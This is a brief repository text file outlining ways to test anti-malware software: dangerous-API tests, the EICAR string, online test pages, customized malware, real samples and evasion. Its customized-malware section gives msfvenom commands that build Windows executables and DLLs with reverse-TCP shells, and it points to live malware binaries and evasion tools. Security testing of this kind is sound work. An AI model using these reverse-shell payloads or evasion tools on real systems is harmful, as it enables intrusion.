-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.txt
65 lines (49 loc) · 3.44 KB
/
index.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
The quality test against Anti-Malware Functionality
Author: Alex Huang (alex.huang@alumni.polyu.edu.hk)
References:
https://www.geckoandfly.com/24644/test-antivirus-security/
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
The quality Test dedicated to Anti-Malware Function could exert the following means: Dangerous API Testing, Testfile Testing, Online Testing, Customized Malware Testing, Real Malware Testing, and Malware Evasion Testing.
1)Dangerous API Testing:
The purpose of the test is to check if the anti-malware system could pinpoint dangerous API being triggered.
The expecting result is that the anti-malware system would capture the attempts of triggering those dangerous APIs and confirm with the user regarding if those attempts are authorized.
Tools: https://www.spyshelter.com/security-test-tool/
Testing Items:
- Keylogging test
- Webcam capturing test
- Test Keystroke Encryption
- Screen capturing test
- Clipboard capturing test
- Sound recording test
- System protection test (Registry access, writing file to startup folder, service registering)
2)Anti-Malware Software Testfile Testing
EICAR is the abbreviation of European Institute for Computer Antivirus Research (EICAR), who proposes a test means by defining a string, which should be defined as a malicious string by anti-malware systems in order to verify the effectiveness of the systems.
3)Online Testing
The purpose of Online Testing is to determine if the anti-malware system can uncover browser-based malware by either downloading or surfing those malicious payloads online.
Normally, an efficient anti-malware system should pinpoint the malicious payloads and stop them from being executed.
Tools: https://www.wicar.org/test-malware.html
Testing Items:
- Downloading a testfile
- Verifying the existence of vulnerabilities
- Executing malicious payloads
4)Customized Malware Testing
Customized Malware Testing aims to confirm whether anti-malware systems can identify those malware being customized.
In general, the malware should still be uncovered after being customized.
Tools: Msfvenom, JPS Virus Maker
Msfvenom Use Cases:
Executable with Meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe
Executable with Windows cmd:
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe
Windows DLL with Windows cmd:
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll
Execute Windows Command - generate dll named shell32.dll that will pop calc when ran:
msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll
5)Real Malware Sample Testing
There are some reall malware samples being able to be downloaded from the Internet. The basic idea of using real malware samples is to evaluate the accuracy of identification capability of anti-malware systems.
In general, the name reported by the anti-malware systems should be either the same as or similar to the name shown up in the website providing download links.
Tools: https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/
6)Malware Evasion Testing
The testing is to determine if the malware being obfuscated by traditional evasion tools is still able to be detected by anti-malware systems.
Hopefully, the malware should be able to be identified after being obfuscated by those evasion tools.
Tools: Veil, Venom, and Shellter